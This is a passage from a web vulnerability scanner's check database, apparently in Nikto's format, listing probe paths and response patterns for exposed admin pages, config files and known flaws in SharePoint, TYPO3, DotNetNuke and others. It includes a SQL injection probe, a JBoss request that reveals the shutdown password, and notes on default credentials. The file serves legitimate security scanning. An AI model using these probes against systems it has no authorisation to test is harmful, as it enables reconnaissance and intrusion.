attackers.\",\"\",\"\"\n\"006803\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/lasso/connector.lasso?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"BODY:<\\/Connector>&&BODY:This\\sconnector\\sis\\sdisabled\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006804\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/perl/connector.cgi?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"BODY:<\\/Connector>&&BODY:This\\sconnector\\sis\\sdisabled\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006805\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/php/connector.php?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"BODY:<\\/Connector>&&BODY:This\\sconnector\\sis\\sdisabled\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006806\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/py/connector.py?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"BODY:<\\/Connector>&&BODY:This\\sconnector\\sis\\sdisabled\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006807\",\"\",\"123\",\"/.git/config\",\"GET\",\"BODY:\\[core\\]&&BODY:\\[branch\",\"Git config file found. Infos about repo details may be present.\",\"\",\"\"\n\"006808\",\"\",\"e\",\"/solr/admin/\",\"GET\",\"BODY:Solr\\sadmin\\spage\",\"Apache Solr administration console found\",\"\",\"\"\n\"006809\",\"\",\"2abe\",\"/html/vergessen.html\",\"GET\",\"BODY:uiRestoreFactoryDefaults\",\"The Fritz!Box gateway allows any user to restore factory default settings.\",\"\",\"\"\n\"006810\",\"https://docs.typo3.org/m/typo3/guide-installation/master/en-us/QuickInstall/TheInstallTool/Index.html\",\"2\",\"@TYPO3typo3/install/index.php\",\"GET\",\"CODE:200&&BODY:Install\\sTool\",\"TYPO3 Install Tool identified.\",\"\",\"\"\n\"006811\",\"\",\"2be\",\"/dnnLogin.aspx\",\"GET\",\"BODY:Enter\\syour\\sUser\\sName\\sbelow\",\"DotNetNuke Login page found.\",\"\",\"\"\n\"006812\",\"\",\"2be\",\"/dnn/Login.aspx\",\"GET\",\"BODY:Login_DNN\",\"DotNetNuke Login page found.\",\"\",\"\"\n\"006813\",\"\",\"2be\",\"/tabid/400999900/ctl/Login/portalid/699996/Default.aspx\",\"GET\",\"BODY:Login_DNN\",\"DotNetNuke Login page found with random tabid and portalid parameters.\",\"\",\"\"\n\"006814\",\"\",\"2b\",\"/Portals/_default/Cache/ReadMe.txt\",\"GET\",\"BODY:cache\\ssynchronization\",\"DotNetNuke default page found. Look for an admin interface on /tabid/19/, /tabid/36/ or enumerate numbers to identify logins/content.\",\"\",\"\"\n\"006815\",\"CVE-2013-5117 http://exploit-db.com/exploits/27602/\",\"9\",\"/DesktopModules/DNNArticle/DNNArticleRSS.aspx?portalid=18&moduleid=0&categoryid=1+or+1=@@@JUNK(5)\",\"GET\",\"BODY:Conversion\\sfailed\",\"DotNetNuke SQL injection found.\",\"\",\"\"\n\"006816\",\"http://exploit-db.com/exploits/12700/\",\"52\",\"/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx\",\"GET\",\"BODY:Link\\sGallery\",\"DotNetNuke Link Gallery may allow file upload/retrieval.\",\"\",\"\"\n\"006817\",\"\",\"23\",\"@TYPO3typo3_src/ChangeLog\",\"GET\",\"BODY:Release\\sof\\sTYPO3\",\"TYPO3 ChangeLog file found.\",\"\",\"\"\n\"006818\",\"\",\"23\",\"/_about\",\"GET\",\"BODY:Tildeslash\",\"Unrestricted Monit web interface found. This reveals sensitive information, and may allow stopping of critical services.\",\"\",\"\"\n\"006819\",\"\",\"b\",\"/CFIDE/componentutils/cfcexplorer.cfc\",\"GET\",\"BODY:Component Browser Login\",\"ColdFusion Component Browser. Default password may be 'admin'.\",\"\",\"\"\n\"006820\",\"\",\"1\",\"/includes/db.inc\",\"GET\",\"CODE:200&&BODY:<\\?php\",\"Include files (.inc) should not be served in plain text.\",\"\",\"\"\n\"006821\",\"\",\"2\",\"/bcb/bcbadmSystemInfo.jsp\",\"GET\",\"BODY:SAP SOAP URL:\",\"SAP Business Communication Broker (bcb) may reveal system information.\",\"\",\"\"\n\"006822\",\"CVE-2009-1380\",\"3b\",\"/jmx-console/HtmlAdaptor?action=inspectMBean&name=Catalina%3Atype%3DServer\",\"GET\",\"BODY:Shutdown password\",\"JBoss JMX Agent reveals the shutdown password and port information\",\"\",\"\"\n\"006823\",\"\",\"be\",\"/portlet/login/login.jsp\",\"GET\",\"BODY:sign\\-in\\-form\",\"LifeRay Portal administrative login found.\",\"\",\"\"\n\"006824\",\"CVE-2014-3704 https://www.sektioneins.de/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html\",\"9a\",\"/CHANGELOG.txt\",\"GET\",\"BODY:Drupal (7\\.[012][0-9]|3[0-1])\",\"Drupal version number $1 implies that there is a SQL Injection which can be used for authentication bypass (Drupalgeddon).\",\"\",\"\"\n\"006825\",\"\",\"1\",\"/debug.jsp\",\"GET\",\"CODE:200\",\"Possible debug directory/program found.\",\"\",\"\"\n\"006826\",\"\",\"1\",\"/debug.asp\",\"GET\",\"CODE:200\",\"Possible debug directory/program found.\",\"\",\"\"\n\"006827\",\"\",\"1\",\"/debug.php\",\"GET\",\"CODE:200\",\"Possible debug directory/program found.\",\"\",\"\"\n\"006828\",\"\",\"1\",\"/debug/\",\"GET\",\"CODE:200\",\"Possible debug directory/program found.\",\"\",\"\"\n\"006829\",\"\",\"1\",\"/stats\",\"GET\",\"BODY:Statistics\\sReport\",\"HAProxy stats page found.\",\"\",\"\"\n\"006830\",\"\",\"1\",\"/haproxy_stats\",\"GET\",\"BODY:Statistics\\sReport\",\"HAProxy stats page found.\",\"\",\"\"\n\"006831\",\"\",\"2b\",\"/cgi-bin/info.cgi\",\"GET\",\"CODE:200&&BODY:Model=WDMyCloud\",\"WD My Cloud (Mirror) NAS found. Default credentials for the login on / is 'admin' with an empty password.\",\"\",\"\"\n\"006832\",\"CVE-2001-1013\",\"23\",\"/~ftp/\",\"GET\",\"CODE:200&&!BODY:rtsptext\",\"Allowed to browse ftp user's home directory.\",\"\",\"\"\n\"006833\",\"\",\"3\",\"/web.config.local\",\"GET\",\"BODY:<configuration>&&CODE:200\",\"ASP config (development) file is accessible.\",\"\",\"\"\n\"006834\",\"\",\"123b\",\"/pom.xml\",\"GET\",\"BODY:<project>\",\"Maven Project Object Model file may contain interesting information.\",\"\",\"\"\n\"006835\",\"\",\"123b\",\"/project.xml\",\"GET\",\"BODY:<project>\",\"Maven Project Object Model file may contain interesting information.\",\"\",\"\"\n\"006836\",\"\",\"123b\",\"/maven.xml\",\"GET\",\"BODY:<project\",\"Maven Project Object Model file may contain interesting information.\",\"\",\"\"\n\"006837\",\"\",\"1\",\"/ultrasearch/\",\"GET\",\"BODY:Oracle Ultra Search\",\"Oracle Ultrasearch page found.\",\"\",\"\"\n\"006838\",\"\",\"be\",\"/useradmin/index.jsp\",\"GET\",\"BODY:\\/useradmin\\/userAdminServlet\",\"SAP Admin interface.\",\"\",\"\"\n\"006839\",\"\",\"be\",\"/uddiclient/jsps/index.jsp\",\"GET\",\"BODY:apUrMapi_\",\"SAP Admin interface.\",\"\",\"\"\n\"006840\",\"\",\"be\",\"/webdynpro/dispatcher/sap.com/tc~lm~webadmin~mainframe~wd/WebAdminApp\",\"GET\",\"BODY:SAP\\sNetWeaver\",\"SAP Admin interface.\",\"\",\"\"\n\"006841\",\"\",\"be\",\"/admin/\",\"GET\",\"BODY:<title>Magnolia Login Form<\\/title>&&BODY:<h1>Magnolia Login<\\/h1>\",\"Magnolia administrative login found.\",\"\",\"\"\n\"006842\",\"\",\"3be\",\"@TYPO3superadmin.php\",\"GET\",\"BODY:<title>TYPO3\\sSuper\\sAdmin</\\title>&&BODY:<title>Typo3\\sSuper\\sAdmin<\\/title>&&CODE:200\",\"TYPO3 Super Admin component identified. This could contain passwords and infos about the current installed TYPO3 instances.\",\"\",\"\"\n\"006843\",\"\",\"3be\",\"@TYPO3misc/superadmin.php\",\"GET\",\"BODY:<title>TYPO3\\sSuper\\sAdmin<\\/title>&&BODY:<title>Typo3\\sSuper\\sAdmin<\\/title>&&CODE:200\",\"TYPO3 Super Admin component identified. This could contain passwords and infos about the current installed TYPO3 instances.\",\"\",\"\"\n\"006844\",\"\",\"d\",\"/_vti_bin/lists.asmx\",\"GET\",\"BODY:Lists\\sWeb\\sService\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006845\",\"\",\"d\",\"/_vti_bin/Admin.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006846\",\"\",\"d\",\"/_vti_bin/alerts.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006847\",\"\",\"d\",\"/_vti_bin/AreaService.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006848\",\"\",\"d\",\"/_vti_bin/Authentication.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006849\",\"\",\"d\",\"/_vti_bin/BusinessDataCatalog.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006850\",\"\",\"d\",\"/_vti_bin/copy.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006851\",\"\",\"d\",\"/_vti_bin/dspsts.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006852\",\"\",\"d\",\"/_vti_bin/dws.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006853\",\"\",\"d\",\"/_vti_bin/ExcelService.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006854\",\"\",\"d\",\"/_vti_bin/forms.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006855\",\"\",\"d\",\"/_vti_bin/imaging.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006856\",\"\",\"d\",\"/_vti_bin/meetings.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006857\",\"\",\"d\",\"/_vti_bin/people.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006858\",\"\",\"d\",\"/_vti_bin/People.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006859\",\"\",\"d\",\"/_vti_bin/permissions.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006860\",\"\",\"d\",\"/_vti_bin/Permissions.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006861\",\"\",\"d\",\"/_vti_bin/search.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006862\",\"\",\"d\",\"/_vti_bin/SharepointEmailWS.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006863\",\"\",\"d\",\"/_vti_bin/SiteData.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006864\",\"\",\"d\",\"/_vti_bin/sites.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006865\",\"\",\"d\",\"/_vti_bin/spscrawl.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006866\",\"\",\"d\",\"/_vti_bin/spsdisco.aspx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006867\",\"\",\"d\",\"/_vti_bin/spsearch.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006868\",\"\",\"d\",\"/_vti_bin/UserGroup.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006869\",\"\",\"d\",\"/_vti_bin/UserProfileService.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006870\",\"\",\"d\",\"/_vti_bin/versions.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006871\",\"\",\"d\",\"/_vti_bin/views.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006872\",\"\",\"d\",\"/_vti_bin/Views.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006873\",\"\",\"d\",\"/_vti_bin/webpartpages.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006874\",\"\",\"d\",\"/_vti_bin/WebPartPages.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006875\",\"\",\"d\",\"/_vti_bin/webs.asmx\",\"GET\",\"BODY:Service\\sDescription\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006876\",\"\",\"b1\",\"/_vti_bin/owssvr.dll\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006877\",\"\",\"b1\",\"/_vti_bin/_vti_adm/admin.exe\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006878\",\"\",\"b1\",\"/_vti_bin/_vti_aut/author.exe\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006879\",\"\",\"b1\",\"/_vti_bin/_vti_aut/WS_FTP.log\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006880\",\"\",\"b1\",\"/_vti_bin/_vti_aut/ws_ftp.log\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006881\",\"\",\"b1\",\"/_vti_bin/_vti_aut/author.dll\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006882\",\"\",\"b1\",\"/_layouts/addrole.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006883\",\"\",\"b1\",\"/_layouts/AdminRecycleBin.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006884\",\"\",\"b1\",\"/_layouts/AreaNavigationSettings.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006885\",\"\",\"b1\",\"/_Layouts/AreaTemplateSettings.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006886\",\"\",\"b1\",\"/_Layouts/AreaWelcomePage.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006887\",\"\",\"b1\",\"/_layouts/bpcf.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006888\",\"\",\"b1\",\"/_Layouts/ChangeSiteMasterPage.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006889\",\"\",\"b1\",\"/_layouts/create.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006890\",\"\",\"b1\",\"/_layouts/editgrp.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006891\",\"\",\"b1\",\"/_layouts/editprms.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006892\",\"\",\"b1\",\"/_layouts/help.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006893\",\"\",\"b1\",\"/_layouts/images/\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006894\",\"\",\"b1\",\"/_layouts/listedit.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006895\",\"\",\"b1\",\"/_layouts/ManageFeatures.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006897\",\"\",\"b1\",\"/_layouts/mcontent.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006898\",\"\",\"b1\",\"/_layouts/mngctype.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006899\",\"\",\"b1\",\"/_layouts/mngfield.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006900\",\"\",\"b1\",\"/_layouts/mngsiteadmin.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006901\",\"\",\"b1\",\"/_layouts/mngsubwebs.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006902\",\"\",\"b1\",\"/_layouts/mngsubwebs.aspx?view=sites\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006903\",\"\",\"b1\",\"/_layouts/mobile/mbllists.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006904\",\"\",\"b1\",\"/_layouts/MyInfo.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006905\",\"\",\"b1\",\"/_layouts/MyPage.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006906\",\"\",\"b1\",\"/_layouts/MyTasks.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006907\",\"\",\"b1\",\"/_layouts/navoptions.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006908\",\"\",\"b1\",\"/_layouts/NewDwp.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006909\",\"\",\"b1\",\"/_layouts/newgrp.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006910\",\"\",\"b1\",\"/_layouts/newsbweb.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006912\",\"\",\"b1\",\"/_layouts/PageSettings.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006913\",\"\",\"b1\",\"/_layouts/people.aspx?MembershipGroupId=0\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006914\",\"\",\"b1\",\"/_layouts/permsetup.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006915\",\"\",\"b1\",\"/_layouts/picker.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006916\",\"\",\"b1\",\"/_layouts/policy.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006917\",\"\",\"b1\",\"/_layouts/policyconfig.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006918\",\"\",\"b1\",\"/_layouts/policycts.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006919\",\"\",\"b1\",\"/_layouts/Policylist.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006920\",\"\",\"b1\",\"/_layouts/prjsetng.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006921\",\"\",\"b1\",\"/_layouts/quiklnch.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006922\",\"\",\"b1\",\"/_layouts/recyclebin.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006923\",\"\",\"b1\",\"/_Layouts/RedirectPage.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006924\",\"\",\"b1\",\"/_layouts/role.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006925\",\"\",\"b1\",\"/_layouts/settings.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006926\",\"\",\"b1\",\"/_layouts/SiteDirectorySettings.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006927\",\"\",\"b1\",\"/_layouts/sitemanager.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006928\",\"\",\"b1\",\"/_layouts/SiteManager.aspx?lro=all\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006929\",\"\",\"b1\",\"/_layouts/spcf.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006930\",\"\",\"b1\",\"/_layouts/storman.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006931\",\"\",\"b1\",\"/_layouts/themeweb.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006932\",\"\",\"b1\",\"/_layouts/topnav.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006933\",\"\",\"b1\",\"/_layouts/user.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006934\",\"\",\"b1\",\"/_layouts/userdisp.aspx?ID=1\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006935\",\"\",\"b1\",\"/_layouts/useredit.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006936\",\"\",\"b1\",\"/_layouts/useredit.aspx?ID=1\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006937\",\"\",\"b1\",\"/_layouts/viewlsts.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006938\",\"\",\"b1\",\"/_layouts/vsubwebs.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006939\",\"\",\"b1\",\"/_layouts/WPPrevw.aspx?ID=247\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006940\",\"\",\"b1\",\"/_layouts/wrkmng.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006941\",\"\",\"b1\",\"/Forms/DispForm.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006942\",\"\",\"b1\",\"/Forms/DispForm.aspx?ID=1\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006943\",\"\",\"b1\",\"/Forms/EditForm.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006944\",\"\",\"b1\",\"/Forms/EditForm.aspx?ID=1\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006945\",\"\",\"b1\",\"/Forms/Forms/AllItems.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006946\",\"\",\"b1\",\"/Forms/MyItems.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006947\",\"\",\"b1\",\"/Forms/NewForm.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006948\",\"\",\"b1\",\"/Pages/default.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006949\",\"\",\"b1\",\"/Pages/Forms/AllItems.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006950\",\"\",\"b1\",\"/_catalogs/masterpage/Forms/AllItems.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006951\",\"\",\"b1\",\"/_catalogs/wp/Forms/AllItems.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006952\",\"\",\"b1\",\"/_catalogs/wt/Forms/Common.aspx\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006953\",\"\",\"b1\",\"/_vti_pvt/service.grp\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006954\",\"\",\"b1\",\"/_vti_pvt/botsinf.cnf\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006955\",\"\",\"b1\",\"/_vti_pvt/structure.cnf\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006956\",\"\",\"b1\",\"/_vti_pvt/uniqperm.cnf\",\"GET\",\"CODE:200\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006957\",\"\",\"0\",\"/Editor/assetmanager/assetmanager.php\",\"GET\",\"BODY:Upload\\sFile\",\"InnovaStudio file uploader found\",\"\",\"\"\n\"006958\",\"\",\"23\",\"/Glimpse.axd\",\"GET\",\"BODY:Standard\\sSettings\",\"Glimpse debug program found\",\"\",\"\"\n\"006959\",\"\",\"3\",\"/edevicedesc.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006960\",\"\",\"3\",\"/bmlinks/ddf.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006961\",\"\",\"3\",\"/configd.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006962\",\"\",\"3\",\"/description.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006963\",\"\",\"3\",\"/DeviceDescription.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006964\",\"\",\"3\",\"/etc/linuxigd/gatedesc.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006965\",\"\",\"3\",\"/igddesc.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006966\",\"\",\"3\",\"/IPCamDesc.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006967\",\"\",\"3\",\"/MediaServerDevDesc.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006968\",\"\",\"3\",\"/mini.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006969\",\"\",\"3\",\"/NasDevice.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006970\",\"\",\"3\",\"/nasService.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006971\",\"\",\"3\",\"/PrintBasicDevice.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006972\",\"\",\"3\",\"/Public_UPNP_gatedesc.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006973\",\"\",\"3\",\"/rootDesc.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006974\",\"\",\"3\",\"/rss/Starter_desc.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device 